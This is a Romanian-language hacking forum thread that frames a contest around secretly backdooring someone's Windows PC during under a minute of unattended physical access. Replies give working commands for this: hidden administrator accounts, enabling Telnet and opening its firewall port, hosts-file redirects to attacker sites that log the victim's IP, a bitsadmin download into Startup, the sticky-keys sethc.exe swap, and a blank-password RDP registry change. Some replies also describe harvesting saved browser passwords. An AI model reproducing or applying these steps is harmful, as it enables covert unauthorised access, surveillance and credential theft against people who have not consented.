Jump to content
em

Backdoor in 45 seconds - Challenge

Recommended Posts

Posted

Sa presupunem ca esti la cineva acasa si lipseste un timp foarte scurt de la calculator (30secunde - 1minut).

Scopul tau. Sa iti asiguri un backdoor permanent la acel calculator.

Piedici:

* Calculatorul nu are net in acel moment.

* Nu ai cu tine niciun stick USB/CD whatevar.

* Ownerul calculatorului nu trebuie sa se prinda de nimic.

Va castiga cel cu solutia cea mai ingenioasa care ofera controlul cel mai mare la resursele sistemului. Luati in calcul si un posibil antivirus.

Restrictii:

* Windows

Premiu:

* O carte de programare. (cat 2 biblii)

Posted

- sa incercam sa configuram un RDP pe acel sistem.

- am mai putea crea un fisier.bat care sa downloadeze si mai apoi sa execute un fisier de pe un ftp sau site (pentru executare sa il punem in start-up sau intr-un autorun.inf pe toate partitiile)

Sunt curios ce raspunsuri vor da altii deoarece timpul acordat e foarte scurt,surse externe nu ai pentru a downloada,instala altceva.

Daca considerati ca am scris SF-uri,va rog corectati-ma

Posted
Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?

Mai am timp sa schimb homepage-ul de la browser cu un link care iti trimite automat adresa de IP prin mail (sunt destule servicii free pe net) , imediat ce se conecteaza la internet si deschide browserul , voi primi un mail cu IP-ul sau .

Posted

@sandabot - sau sa setezi ca homepage un site facut de tine care sa scrie IP-ul victimei intr-un fisier tot la tine pe site si imediat sa il redirectioneze pe google,sau alta pagina.

Posted (edited)

Stergi system32, te faci ca ploua cand vede ca nu mai merge, si cum te stie bun in d-ale pc-urilor te cheama sa il reinstalezi.

Ai castigat timp cacalau pana a 2-a zi sau cand te duci sa-l instalezi sa te pregatesti cu tot ce vrei.

Ideea e sa-l strici in alea 45 secunde sau cat ai si dupaia te oferi sa-i reinstalezi sistemul de operare => timp suficient pentru orice :D

Edited by BogdanNBV
Posted

Daca era laptop:

Imi „tranformam” telefonul intr-un hotspot wifi, iar odata ce laptop-ul avea internet ii puteam downloada pana si filme porno fara sa-si dea seama.

Daca era PC sau laptop si avea AutoIt instalat:

Asta s-ar fi putut intampla foarte rar, dar nu excludem cazul.

Faceam un script in AutoIt care sa-mi poata asigura backdoorul si sa-mi poata oferii ip-ul si-l puneam sa ruleze la fiecare pornire. (chiar dureaza putin)

Sa nu-mi spuneti ca nu aveam telefonul la mine, asa ceva nu exista :))

Posted

Modific in hosts cateva site-uri sa indice catre clone facute/hostate de mine.(pentru a obtine ip-ul)

Creez un user nou cu o parola pusa de mine si activez optiunea de rdp.creez un mic bat care sa se conecteze prin telnet la mine si sa imi trimita ip-ul si poate alte informatii

bat-ul il bag la autorun pe toate partitiile.

Modific in group policy sa nu faca lock-out dupa un anumit numar de incercari de logare, si incerc sa fac bruteforce dupa aia(conjunctie cu telnetu/hosts-ul).

Modific tot in gp sa ma pot loga cu guest prin rdp.

Posted
Modific in hosts cateva site-uri sa indice catre clone facute/hostate de mine.(pentru a obtine ip-ul)

Creez un user nou cu o parola pusa de mine si activez optiunea de rdp.creez un mic bat care sa se conecteze prin telnet la mine si sa imi trimita ip-ul si poate alte informatii

bat-ul il bag la autorun pe toate partitiile.

Modific in group policy sa nu faca lock-out dupa un anumit numar de incercari de logare, si incerc sa fac bruteforce dupa aia(conjunctie cu telnetu/hosts-ul).

Modific tot in gp sa ma pot loga cu guest prin rdp.

Si in acelasi timp, mergi cu viteza luminii astfel incat timpul sa se dilate. Cele 2 minute care ti-au luat sa faci asta vor parea 45 de secunde pentru tinta. :)

Posted (edited)

start > run > cmd


net user Administrator /active:yes
net user (username) (password) /add
net localgroup Administrators /add (username)
net localgroup /add TelnetClients
net localgroup TelnetClients /add (username)
sc config TlntSvr start= auto


net start TlntSvr
netsh
firewall
add portopening TCP 23 "Telnet"

next


echo www.google.ro www.domeniulmeu.ro >> C:\Windows\System32\drivers\etc\hosts

cand ajung acasa pun pe domeniulmeu.ro un iframe mare spre pagina de goagal si inserez un mic script ce inregistreaza ip-ul ce ajunge pe pagina

(optional) comenzile pot fi puse intr-un bat si pregatite din timp , astfel incat tot ce avem de facut e sa accesam domeniul.ro/batulmeu.bat , descarcam si executam bat-ul si aia e , asteptam.

Edited by black_death_c4t
Posted

Nu toate :))

Ori una ori alta.

Modifici host si crezi fisierul bat

sau Creezi un user nou si activezi rdp

Sau

Modifici in gp lockout-ul la parola gresita si bat-ul/hosts

sau

Modific in gp sa ma pot loga cu guest prin rdp si bat-ul/hosts

Posted
start > run > cmd


net user Administrator /active:yes
net user (username) (password) /add
net localgroup Administrators /add (username)
net localgroup /add TelnetClients
net localgroup TelnetClients /add (username)
sc config TlntSvr start= auto


net start TlntSvr
netsh
firewall
add portopening TCP 23 "Telnet"

next


echo www.google.ro www.domeniulmeu.ro >> C:\Windows\System32\drivers\etc\hosts

cand ajung acasa pun pe domeniulmeu.ro un iframe mare spre pagina de goagal si inserez un mic script ce inregistreaza ip-ul ce ajunge pe pagina

comenzile pot fi puse intr-un bat si pregatite din timp , astfel incat tot ce avem de facut e sa accesam domeniul.ro/batulmeu.bat , descarcam si executam bat-ul si aia e , asteptam.

nu are net pentru desc?rcarea .bat-ului, ?i ca s? nu-?i dea seama, noi avem deja preg?tit un site care face request pe un ?url= ?i dup? ce îi ia ip îi face redirect pe url-ul respectiv, astfel ii punem doar homepageul in hosts :).

Posted (edited)
Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?

Dupa ce se termina toata faza cu 45sec, ulterior vorbim pe mess si ii aflu ip-ul prin oricare 1000 de metode disponibile (ii arat poza/pagina, fisier, apel audio/video).

Edited by Cryo
Posted (edited)

Cu putin antrenament scoti sub 35-40 de secunde:

Creezi un .bat cu:

bitsadmin /transfer /download downloadlink.cv C:\StartupDir

Il salvezi intr-un folder sa nu-l gaseasca dupa care creezi o scurtatura in startup a acestui script cu optiunea Run: Minimized.

Daca victima este idioata direct liniile alea la startup.

In cazul in care mai ramane umpic de timp activezi si RDP iar ip-ul il prinzi pe hostul cu fisierul.

O sa vin cu o demonstratie video daca este cazul.

:)) Wow, cand am intrat era un singur post, acuma... :)

Edit2: Daca vrei se fie ceva mai piperat challenge-ul impune ca victima sa nu fie un idiot ci o presoana care stie cu ce se mananca un calculator, presupunem ca suntem in sediul unei firme, primarii sau alte institutii.

Edited by curiosul
Posted

Vechea metoda cu sticky keys: deschizi %windir%/System32/, faci o copie de siguranta a lui sethc.exe si apoi copiezi cmd.exe in locul lui. Partea buna e ca ai un fel de "backdoor" in sensul ca poti porni consola cu drepturi de administrator direct din ecranul de autentificare, dar partea rea e ca asta se poate face doar local.

Posted

hai s? v? propun ?i eu o metod? mai eficient? :).

- homepageul browserului lui default in hosts spre un link de-al nostru care ii ia ip, apoi face redirect pe $_SERVER['HTTP_HOST']; ( în cazul ?sta, putem avea de dinainte preg?tit scriptul, e folositor s? ai a?a ceva preg?tit oricând)

- un simplu ?i rapid enable la terminal server din cpanel ?i disable din acela?i loc la firewall

acas?, pur ?i simplu folosim unul din zecile de exploituri referitoare la terminal server, gen MS Windows (RPC DCOM) Remote Exploit (Universal Targets). în caz c? nu merge chiar niciunul (0,01% ?ans?) putem da ?i bruteforce cu tsgrinder, ?i avem acces la "terminal" în windows, de unde putem da enable ?i la rdp, ?i multe altele, f?r? ca "ownerul" s?-?i dea seama :)

Posted

intri in cstrike/resource/GameMenu.res si modifici astfel incat atunci cand da click cand pe "Find servers" sa se conecteze la un domeniu imaginar de-al tau ..... gen cs.ablasadubsa.com (sa fie totusi memorabil), ulterior cumperi domeniul si iti pui serverul de cs pe el, se va conecta la serverul tau si stim cu totii ce securitate are cs....

plus ca jocul ruleaza cu privilegii de administrator (in 99.9% din cazuri), si antivirusul nu va comenta

in cs serverul poate rula fara probleme comenzi consolele clientilor

si avem un oarecare control asupra sistemului

Posted
intri in cstrike/resource/GameMenu.res si modifici astfel incat atunci cand da click cand pe "Find servers" sa se conecteze la un domeniu imaginar de-al tau ..... gen cs.ablasadubsa.com (sa fie totusi memorabil), ulterior cumperi domeniul si iti pui serverul de cs pe el, se va conecta la serverul tau si stim cu totii ce securitate are cs....

plus ca jocul ruleaza cu privilegii de administrator (in 99.9% din cazuri), si antivirusul nu va comenta

in cs serverul poate rula fara probleme comenzi consolele clientilor

si avem un oarecare control asupra sistemului

Curios stiam ca exista exploituri la CS. Cel clasic este in motd-ul care apare dupa ce te-ai conectat la un server pentru ca era randat de Internet Explorer. Dar nu stiu de comenzi date de admin care ar putea compormite securitatea calculatorului. Poti da un exemplu? Exista comenzi care iti permit de exemplu sa scrii fisiere?

Posted
Curios stiam ca exista exploituri la CS. Cel clasic este in motd-ul care apare dupa ce te-ai conectat la un server pentru ca era randat de Internet Explorer. Dar nu stiu de comenzi date de admin care ar putea compormite securitatea calculatorului. Poti da un exemplu? Exista comenzi care iti permit de exemplu sa scrii fisiere?

vorbe?te prostii. singurele comenzi care pot fi executate asupra juc?torului sunt doar comenzile care le poate da ?i juc?torul singur ( quit, kill, connect server.plm, sensitivity 8.0, etc), nu ai control în afara cs-ului. cel cu motd ar fi fost singura op?iune

Posted (edited)

da, poti sa-l faci sa downlodeze/suprascrie fisiere din folderul cstrike

am citit undeva niste sf-uri de genul:

-rulezi niste comenzi ce schimba locatia si numele fisierului in care jocul isi tine logul, si il pui in folderul de Startup cu extensia .bat

-scrii linii in log(cod)

-stim cu totii ce se intampla la urmatoarea pornire

dar merge foarte bine si cu motd, chiar am uitat de asta

EDIT: am aflat ca nu functioneaza cazul acela sf, deci ramane motd

dar eu as fi facut altceva...

m-as fi uitat in parolele puse pe remember de browser si as fi memorat cat mai multe

merge repede: tools->options->security->saved passwords, sau ceva de genu

oricum meniurile sunt intuitive

Edited by Cryo
Posted (edited)

1.Deschizi internet browser-ul(5 secunde)

2.Retii homepage-ul initial si modifici homepage-ul astfel incat sa corespunda cu url catre host-ul sau pagina pe care ai incarca un posibil backdoor (5-10 secunde);

3.Modifici sau bifezi (daca e cazul) optiunea "Save files to.." si retii adresa(path-ul) la care ar fi salvat backdoor-ul(5-10 secunde);

4.Modifici registrii,tinand cont de path-ul unde backdoorul va fi descarcat in momentul in care victima ar redeschide explorerul,in asa fel incat StartUp-ul sa ruleze backdoorul de fiecare data cand calculatorul ar fi reboot-at (10 secunde);

Cam atat ar fi de facut.

Apoi creezi pagina(in cazul in care nu ai fi facut-o inainte) si ai grija ca sa modifici codul paginii respective in asa fel incat,dupa un interval scurt dupa momentul in care victima ar deschide explorerul(ceea ce ar declansa descarcarea automata a backdoor-ului) sa-l redirectioneze catre pagina initiala la care ar fi fost setata optiunea de HomePage a explorerului(vezi pasul 2 "Retii home page-ul initial") pentru a nu atrage atentia.

Apoi creezi un server de ascultare depinzand de backdoor,parametrii si utilitate(in cazul in care ai folosi Metasploit) si pe urma depinde numai de tine...

Astept critici.. :)

Edited by h4sh
Posted (edited)

ipul nu e atat de important fiindca se poate obtine foarte usor: dupa id de yahoo messenger(sau te duci in yahoo/profiles) sau skype, si apoi afli online cu Get Yahoo Messenger Ip sau SkypeGrab - Free Skype Resolver

in 30 sec max:

system proprieties/allow connection from computers running any version of remote desktop

Local Security Policy > Security Settings > Local Policies > Security Options

At the top of the list is "Accounts: Limit local account use of blank passwords to console logon only"

pus pe disabled sau

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse set 0

ip>rdp>bootkit

Edited by dicksi

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...